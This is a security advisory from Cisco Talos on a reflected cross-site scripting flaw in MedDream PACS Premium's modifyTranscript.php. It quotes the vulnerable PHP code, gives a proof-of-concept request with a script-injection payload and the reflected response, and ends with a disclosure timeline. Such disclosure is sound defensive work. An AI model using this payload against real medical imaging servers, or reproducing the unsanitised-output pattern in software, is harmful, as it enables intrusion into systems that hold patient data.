CVE-2025-53707
A reflected cross-site scripting (xss) vulnerability exists in the modifyTranscript functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.6.870
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
A pre-authentication reflected cross-site scripting vulnerability exists in the functionality of the Pacs/modifyTranscript.php script.
The value of the name parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 39
if (isset($_GET['name'])) {
modifyEntryForm(urldecode($_GET['name']), $mbytes); /// [1]
// 390
function modifyEntryForm($name, $mbytes)
{
print "<td><input type='text' size=32 maxlength=64 name='name' value='$name' readonly></td></tr>\n"; /// [2]
print "<tr><td>";
print pacsone_gettext("Upload Transcription Template Word Document: ");
print pacsone_gettext("(This Word template will contain the following bookmarks)");
print "</td>";
$disabled = "";
if (isset($_SESSION['attachments'])) {
// allow only 1 attachment for the template document
if (count($_SESSION['attachments']))
$disabled = "disabled";
}
$result = $dbcon->query("select path from xscriptemplate");
if (!$result || $result->rowCount() == 0) {
die(pacsone_gettext("Error: Cannot find transcription document template: ") . $name); /// [3]
}
The $name variable is set by the attacker and is fully controllable [1]. Further inside the modifyEntryForm function, the $name value is printed directly into the page content without sanitization in several places [2], [3].
Example of a malicious request and response containing injected HTML/JavaScript code:
GET /Pacs/modifyTranscript.php?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%20%A9%C7%FB%B1%7F2%8Cs%18%FE1%BD%E5%9E%2F%FBCB%F3S%BE%A6%EF%9E%A6%BEFe%FB%ED9; PHPSESSID=e57f22ea61aace53702ee3443fabe583; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
RESP
HTTP/1.1 200 OK
Date: Wed, 20 Aug 2025 12:37:01 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4901
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
...
<table width=100% border=1 cellpadding=3 cellspacing=0>
<tr><td>Transcription Template Name:</td>
<td><input type='text' size=32 maxlength=64 name='name' value='<script>alert(1)</script>' readonly></td></tr>
<tr><td>Upload Transcription Template Word Document: (This Word template will contain the following bookmarks)</td>Error: Cannot find transcription document template: <script>alert(1)</script></div>
2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.